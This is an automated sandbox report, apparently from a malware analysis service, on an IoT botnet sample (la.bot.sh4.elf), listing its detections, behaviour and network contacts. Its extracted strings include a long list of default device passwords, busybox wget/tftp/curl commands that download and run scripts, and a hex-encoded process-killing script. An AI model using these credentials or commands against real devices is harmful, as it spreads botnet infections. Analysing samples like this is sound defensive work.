Linux Analysis Report
la.bot.sh4.elf

Overview

General Information

Sample name: la.bot.sh4.elf
Analysis ID: 1540906
MD5: 290b9c4c233406757539d473ca4a0012
SHA1: 61ebdb2764947bfa6d500ef6c17ce0eddb02fda5
SHA256: 86096ba78f9747217b14ab65928a0b2ce7ebcb878435ba41ccace344eae0aa68
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 64
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Deletes system log files
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: la.bot.sh4.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: la.bot.sh4.elf ReversingLabs: Detection: 34%
Found strings indicative of a multi-platform dropper
Source: la.bot.sh4.elf String: ash|login|wget|curl|tftp|ntpdate
Source: la.bot.sh4.elf String: l/proc//exe|ash|login|wget|curl|tftp|ntpdate/fd/dev/null|/dev/consolesocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin//proc/net/tcp/proc/fd//proc/self/exe/. /proc//maps/lib//dev/watchdog/dev/misc/watchdogtelnetd|udhcpc|ntpclient|boa|httpd|mini_http|watchdog|pppdM
Source: la.bot.sh4.elf String: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.13:57586 -> 156.244.13.91:7193
Sample listens on a socket
Source: /tmp/la.bot.sh4.elf (PID: 5437) Socket: 127.0.0.1:1234 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 16.17.89.42
Source: unknown TCP traffic detected without corresponding DNS query: 191.32.138.101
Source: unknown TCP traffic detected without corresponding DNS query: 16.17.89.42
Source: unknown TCP traffic detected without corresponding DNS query: 191.32.138.101
Source: unknown TCP traffic detected without corresponding DNS query: 131.67.17.206
Source: unknown TCP traffic detected without corresponding DNS query: 131.67.17.206
Source: unknown TCP traffic detected without corresponding DNS query: 73.160.64.117
Source: unknown TCP traffic detected without corresponding DNS query: 111.78.162.135
Source: unknown TCP traffic detected without corresponding DNS query: 73.160.64.117
Source: unknown TCP traffic detected without corresponding DNS query: 111.78.162.135
Source: unknown TCP traffic detected without corresponding DNS query: 170.250.114.230
Source: unknown TCP traffic detected without corresponding DNS query: 103.115.37.66
Source: unknown TCP traffic detected without corresponding DNS query: 170.250.114.230
Source: unknown TCP traffic detected without corresponding DNS query: 154.136.87.181
Source: unknown TCP traffic detected without corresponding DNS query: 103.115.37.66
Source: unknown TCP traffic detected without corresponding DNS query: 83.194.19.140
Source: unknown TCP traffic detected without corresponding DNS query: 154.136.87.181
Source: unknown TCP traffic detected without corresponding DNS query: 105.115.19.192
Source: unknown TCP traffic detected without corresponding DNS query: 11.19.213.62
Source: unknown TCP traffic detected without corresponding DNS query: 83.194.19.140
Source: unknown TCP traffic detected without corresponding DNS query: 39.213.86.53
Source: unknown TCP traffic detected without corresponding DNS query: 105.115.19.192
Source: unknown TCP traffic detected without corresponding DNS query: 89.41.122.212
Source: unknown TCP traffic detected without corresponding DNS query: 11.19.213.62
Source: unknown TCP traffic detected without corresponding DNS query: 11.113.255.230
Source: unknown TCP traffic detected without corresponding DNS query: 39.213.86.53
Source: unknown TCP traffic detected without corresponding DNS query: 113.65.122.131
Source: unknown TCP traffic detected without corresponding DNS query: 89.41.122.212
Source: unknown TCP traffic detected without corresponding DNS query: 64.176.167.95
Source: unknown TCP traffic detected without corresponding DNS query: 11.113.255.230
Source: unknown TCP traffic detected without corresponding DNS query: 148.216.91.212
Source: unknown TCP traffic detected without corresponding DNS query: 113.65.122.131
Source: unknown TCP traffic detected without corresponding DNS query: 41.3.165.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.176.167.95
Source: unknown TCP traffic detected without corresponding DNS query: 108.245.163.164
Source: unknown TCP traffic detected without corresponding DNS query: 148.216.91.212
Source: unknown TCP traffic detected without corresponding DNS query: 114.168.208.171
Source: unknown TCP traffic detected without corresponding DNS query: 41.3.165.113
Source: unknown TCP traffic detected without corresponding DNS query: 222.164.127.30
Source: unknown TCP traffic detected without corresponding DNS query: 108.245.163.164
Source: unknown TCP traffic detected without corresponding DNS query: 167.153.73.0
Source: unknown TCP traffic detected without corresponding DNS query: 114.168.208.171
Source: unknown TCP traffic detected without corresponding DNS query: 222.164.127.30
Source: unknown TCP traffic detected without corresponding DNS query: 202.128.223.78
Source: unknown TCP traffic detected without corresponding DNS query: 167.153.73.0
Source: unknown TCP traffic detected without corresponding DNS query: 39.122.239.162
Source: unknown TCP traffic detected without corresponding DNS query: 202.128.223.78
Source: unknown TCP traffic detected without corresponding DNS query: 27.164.73.22
Source: unknown TCP traffic detected without corresponding DNS query: 39.122.239.162
Source: unknown TCP traffic detected without corresponding DNS query: 103.13.167.80
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: la.bot.sh4.elf String found in binary or memory: http:///curl.sh
Source: la.bot.sh4.elf String found in binary or memory: http:///wget.sh
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sample String containing 'busybox' found: usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sample String containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal64.evad.linELF@0/0@2/0

Data Obfuscation
barindex
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Source: /tmp/la.bot.sh4.elf (PID: 5443) File: /etc/config Jump to behavior
Creates hidden files and/or directories
Source: /tmp/la.bot.sh4.elf (PID: 5443) Directory: /root/.cache Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 5443) Directory: /root/.ssh Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 5443) Directory: /root/.config Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 5443) Directory: /root/.local Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 5443) Directory: /tmp/.X11-unix Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 5443) Directory: /tmp/.Test-unix Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 5443) Directory: /tmp/.font-unix Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 5443) Directory: /tmp/.ICE-unix Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 5443) Directory: /tmp/.XIM-unix Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 5443) Directory: /etc/.java Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Deletes system log files
Source: /tmp/la.bot.sh4.elf (PID: 5443) Log files deleted: /var/log/kern.log Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/la.bot.sh4.elf (PID: 5437) Queries kernel information via 'uname': Jump to behavior
Source: la.bot.sh4.elf, 5437.1.00007ffe4d371000.00007ffe4d392000.rw-.sdmp Binary or memory string: /usr/bin/qemu-sh4
Source: la.bot.sh4.elf, 5437.1.0000556757d1e000.0000556757da1000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/sh4
Source: la.bot.sh4.elf, 5437.1.0000556757d1e000.0000556757da1000.rw-.sdmp Binary or memory string: WgU5!/etc/qemu-binfmt/sh4
Source: la.bot.sh4.elf, 5437.1.00007ffe4d371000.00007ffe4d392000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-sh4/tmp/la.bot.sh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.sh4.elf

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
222.120.56.83
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
83.169.223.174
 unknown Russian Federation
29648 COMLINE-ASRU false
155.5.164.173
 unknown United States
1637 DNIC-AS-01637US false
79.112.126.223
 unknown Romania
8708 RCS-RDS73-75DrStaicoviciRO false
151.113.181.187
 unknown United States
32480 LLUMCUS false
129.160.59.165
 unknown United States
3359 U-ALBERTACA false
81.167.22.118
 unknown Norway
29695 ALTIBOX_ASNorwayNO false
46.235.184.178
 unknown Russian Federation
34879 CCT-ASNGENIXRU false
207.142.14.166
 unknown United States
27229 WEBHOST-ASN1US false
112.251.116.72
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
188.0.97.56
 unknown Ukraine
42430 HOMELANSeverodonetskUkraineUA false
20.176.23.141
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
50.35.4.210
 unknown United States
27017 ZIPLY-FIBER-LEGACY-ASNUS false
109.102.216.237
 unknown Romania
9050 RTDBucharestRomaniaRO false
221.28.17.83
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
186.184.140.142
 unknown Venezuela
6306 TELEFONICAVENEZOLANACAVE false
88.110.161.34
 unknown United Kingdom
9105 TISCALI-UKTalkTalkCommunicationsLimitedGB false
60.203.52.136
 unknown China
9595 XEPHIONNTT-MECorporationJP false
133.61.86.250
 unknown Japan 2907 SINET-ASResearchOrganizationofInformationandSystemsN false
107.157.252.158
 unknown United States
7065 SONOMAUS false
120.130.249.145
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
88.23.211.45
 unknown Spain
3352 TELEFONICA_DE_ESPANAES false
28.223.163.71
 unknown United States
7922 COMCAST-7922US false
72.95.107.192
 unknown United States
13977 CTELCOUS false
214.250.38.4
 unknown United States
721 DNIC-ASBLK-00721-00726US false
206.4.248.210
 unknown United States
174 COGENT-174US false
47.193.95.23
 unknown United States
5650 FRONTIER-FRTRUS false
207.151.9.39
 unknown United States
27609 USC-UNIVERSITY-HOSPITALUS false
52.102.102.239
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
176.164.232.202
 unknown France
5410 BOUYGTEL-ISPFR false
113.161.104.2
 unknown Viet Nam
45899 VNPT-AS-VNVNPTCorpVN false
30.92.106.2
 unknown United States
7922 COMCAST-7922US false
49.12.72.134
 unknown Germany
24940 HETZNER-ASDE false
49.19.37.213
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
205.25.218.172
 unknown United States
2914 NTT-COMMUNICATIONS-2914US false
167.142.250.202
 unknown United States
5056 AUREON-5056US false
113.141.147.39
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
223.191.242.255
 unknown India
45609 BHARTI-MOBILITY-AS-APBhartiAirtelLtdASforGPRSService false
154.235.232.180
 unknown Cote D'ivoire
36974 AFNET-ASCI false
182.18.9.213
 unknown China
23724 CHINANET-IDC-BJ-APIDCChinaTelecommunicationsCorporation false
218.180.13.196
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
21.2.122.209
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
85.114.129.124
 unknown Germany
24961 MYLOC-ASIPBackboneofmyLocmanagedITAGDE false
194.121.247.53
 unknown Germany
1136 KPNKPNNationalEU false
34.220.194.231
 unknown United States
16509 AMAZON-02US false
142.202.56.48
 unknown Reserved
17004 BROADBANDONDEMANDUS false
30.174.224.174
 unknown United States
7922 COMCAST-7922US false
91.8.164.62
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
71.117.26.134
 unknown United States
701 UUNETUS false
80.37.247.23
 unknown Spain
3352 TELEFONICA_DE_ESPANAES false
98.187.56.101
 unknown United States
22773 ASN-CXA-ALL-CCI-22773-RDCUS false
148.44.178.68
 unknown United States
6400 CompaniaDominicanadeTelefonosSADO false
183.16.196.220
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
48.55.67.8
 unknown United States
2686 ATGS-MMD-ASUS false
71.99.245.185
 unknown United States
5650 FRONTIER-FRTRUS false
94.64.38.149
 unknown Greece
6799 OTENET-GRAthens-GreeceGR false
78.137.148.38
 unknown Ireland
31122 DIGIWEB-ASIE false
100.145.13.136
 unknown United States
21928 T-MOBILE-AS21928US false
76.252.211.28
 unknown United States
7018 ATT-INTERNET4US false
167.7.84.167
 unknown United States
2939 SCAROLINA-ASUS false
151.250.90.5
 unknown Turkey
34984 TELLCOM-ASTR false
119.82.166.153
 unknown Japan 17698 CCNET-NETCOMMUNITYNETWORKCENTERINCORPORATEDJP false
60.186.155.199
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
182.143.55.241
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
95.187.211.82
 unknown Saudi Arabia
39891 ALJAWWALSTC-ASSA false
41.2.107.139
 unknown South Africa
29975 VODACOM-ZA false
174.33.6.212
 unknown United States
6621 HNS-DIRECPCUS false
53.255.229.25
 unknown Germany
31399 DAIMLER-ASITIGNGlobalNetworkDE false
79.248.154.33
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
64.241.12.222
 unknown United States
3561 CENTURYLINK-LEGACY-SAVVISUS false
9.138.158.123
 unknown United States
3356 LEVEL3US false
156.70.25.45
 unknown United States
297 AS297US false
92.53.102.17
 unknown Russian Federation
49505 SELECTELRU false
17.4.101.52
 unknown United States
714 APPLE-ENGINEERINGUS false
112.184.20.31
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
87.196.114.175
 unknown Portugal
2860 NOS_COMUNICACOESPT false
122.87.229.159
 unknown China
9394 CTTNETChinaTieTongTelecommunicationsCorporationCN false
217.57.32.55
 unknown Italy
3269 ASN-IBSNAZIT false
79.127.205.103
 unknown Czech Republic
9080 GINCzechRepublicEUCZ false
27.138.90.44
 unknown Japan 9824 JTCL-JP-ASJupiterTelecommunicationCoLtdJP false
14.87.162.87
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
134.167.19.15
 unknown United States
293 ESNETUS false
147.182.236.130
 unknown United States
27555 BV-PUBLIC-ASNUS false
208.196.19.91
 unknown United States
701 UUNETUS false
3.65.148.25
 unknown United States
16509 AMAZON-02US false
97.45.157.36
 unknown United States
22394 CELLCOUS false
84.136.121.75
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
197.142.86.171
 unknown Algeria
36891 ICOSNET-ASDZ false
29.205.220.9
 unknown United States
7922 COMCAST-7922US false
165.139.38.147
 unknown United States
11686 ENAUS false
194.177.242.136
 unknown Greenland
8818 TeleGreenlandGL false
157.197.7.243
 unknown Korea Republic of
4704 SANNETRakutenMobileIncJP false
197.161.93.179
 unknown Egypt
24863 LINKdotNET-ASEG false
70.126.196.49
 unknown United States
33363 BHN-33363US false
25.127.239.213
 unknown United Kingdom
7922 COMCAST-7922US false
121.226.187.101
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
146.165.75.101
 unknown United States
1254 AS1254US false
44.40.151.25
 unknown United States
7377 UCSDUS false
138.175.93.225
 unknown United States
637 DNIC-ASBLK-00616-00665US false
160.18.44.37
 unknown Japan 9370 SAKURA-BSAKURAInternetIncJP false

Contacted Domains

Name IP Active
daisy.ubuntu.com 162.213.35.24 true